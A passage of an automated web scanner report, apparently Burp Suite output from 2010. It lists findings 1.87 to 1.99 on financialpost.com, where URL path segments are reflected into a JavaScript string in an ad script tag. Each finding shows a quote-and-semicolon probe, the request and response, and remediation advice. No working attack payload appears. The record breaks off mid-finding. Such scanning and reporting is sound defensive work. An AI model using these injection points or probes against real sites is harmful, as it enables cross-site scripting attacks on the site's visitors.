<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveb3dfa';c1a1cb098d5/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveb3dfa';c1a1cb098d5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83962964?">
...[SNIP]...

1.87. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+companies+honest+with+their+employees/3987151/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43db7'%3b7532e4f4caa was submitted in the REST URL parameter 3. This input was echoed as 43db7';7532e4f4caa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+companies+honest+with+their+employees/398715143db7'%3b7532e4f4caa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71329
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-companies-honest-with-their-employees/398715143db7';7532e4f4caa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-companies-honest-with-their-employees;kw=398715143db7';7532e4f4caa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa
...[SNIP]...

1.88. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+companies+honest+with+their+employees/3987151/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f5d'%3bbfa9b0eb109 was submitted in the REST URL parameter 4. This input was echoed as 69f5d';bfa9b0eb109 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+companies+honest+with+their+employees/3987151/69f5d'%3bbfa9b0eb109 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44711


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership%20companies%20honest%20with%20their%20employees/3987151/69f5d';bfa9b0eb109/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership%20companies%20honest%20with%20their%20employees;kw=3987151;kw=69f5d';bfa9b0eb109;kw=npo;kw=fpo;tile='+dartad_tile+
...[SNIP]...

1.89. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+make+good+decisions/3957410/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7cd1'%3b8a87ca5dda7 was submitted in the REST URL parameter 1. This input was echoed as a7cd1';8a87ca5dda7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executivea7cd1'%3b8a87ca5dda7/Leadership+make+good+decisions/3957410/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79991
Expires: Sun, 19 Dec 2010 03:12:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executivea7cd1';8a87ca5dda7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executivea7cd1';8a87ca5dda7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33160721?">
...[SNIP]...

1.90. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+make+good+decisions/3957410/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea152'%3b5875384a269 was submitted in the REST URL parameter 3. This input was echoed as ea152';5875384a269 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+make+good+decisions/3957410ea152'%3b5875384a269/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69799
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-make-good-decisions/3957410ea152';5875384a269/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-make-good-decisions;kw=3957410ea152';5875384a269;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord
...[SNIP]...

1.91. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+make+good+decisions/3957410/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacb0'%3b92563dfa8ca was submitted in the REST URL parameter 4. This input was echoed as bacb0';92563dfa8ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+make+good+decisions/3957410/bacb0'%3b92563dfa8ca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45046


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership%20make%20good%20decisions/3957410/bacb0';92563dfa8ca/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership%20make%20good%20decisions;kw=3957410;kw=bacb0';92563dfa8ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou
...[SNIP]...

1.92. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Organizations+fight+bureaucracy/3992875/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae28c'%3bc70cc79a0a1 was submitted in the REST URL parameter 1. This input was echoed as ae28c';c70cc79a0a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executiveae28c'%3bc70cc79a0a1/Organizations+fight+bureaucracy/3992875/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 88315
Expires: Sun, 19 Dec 2010 03:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveae28c';c70cc79a0a1/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveae28c';c70cc79a0a1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99274053?">
...[SNIP]...

1.93. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Organizations+fight+bureaucracy/3992875/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c87f'%3bc33c1d433bd was submitted in the REST URL parameter 3. This input was echoed as 2c87f';c33c1d433bd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Organizations+fight+bureaucracy/39928752c87f'%3bc33c1d433bd/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63883
Expires: Sun, 19 Dec 2010 03:12:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/organizations-fight-bureaucracy/39928752c87f';c33c1d433bd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=organizations-fight-bureaucracy;kw=39928752c87f';c33c1d433bd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'or
...[SNIP]...

1.94. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Organizations+fight+bureaucracy/3992875/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c799'%3bc87820a0f13 was submitted in the REST URL parameter 4. This input was echoed as 2c799';c87820a0f13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Organizations+fight+bureaucracy/3992875/2c799'%3bc87820a0f13 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/organizations%20fight%20bureaucracy/3992875/2c799';c87820a0f13/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=organizations%20fight%20bureaucracy;kw=3992875;kw=2c799';c87820a0f13;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroun
...[SNIP]...

1.95. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/canadian-mba-programs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b293e'%3b061095bc4ca was submitted in the REST URL parameter 1. This input was echoed as b293e';061095bc4ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executiveb293e'%3b061095bc4ca/canadian-mba-programs/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43656


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveb293e';061095bc4ca/canadian-mba-programs/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveb293e';061095bc4ca;kw=canadian-mba-programs;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'o
...[SNIP]...

1.96. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/canadian-mba-programs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8f55'%3bcca8fb45330 was submitted in the REST URL parameter 2. This input was echoed as e8f55';cca8fb45330 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/canadian-mba-programse8f55'%3bcca8fb45330/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44440


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/canadian-mba-programse8f55';cca8fb45330/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=canadian-mba-programse8f55';cca8fb45330;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=18233465?">
...[SNIP]...

1.97. http://www.financialpost.com/executive/ceo/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/ceo/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aba'%3bb9fb836393d was submitted in the REST URL parameter 1. This input was echoed as 98aba';b9fb836393d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive98aba'%3bb9fb836393d/ceo/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37452


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive98aba';b9fb836393d/ceo/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive98aba';b9fb836393d;kw=ceo;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=75987676?">
...[SNIP]...

1.98. http://www.financialpost.com/executive/ceo/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/ceo/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9721'%3b486d1a1eccd was submitted in the REST URL parameter 2. This input was echoed as e9721';486d1a1eccd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/ceoe9721'%3b486d1a1eccd/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37416


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/ceoe9721';486d1a1eccd/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=ceoe9721';486d1a1eccd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=47736748?">
...[SNIP]...

1.99. http://www.financialpost.com/executive/hr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/hr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a5c'%3bdbe23d485fd was submitted in the REST URL parameter 1. This input was echoed as d2a5c';dbe23d485fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executived2a5c'%3bdbe23d485fd/hr/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
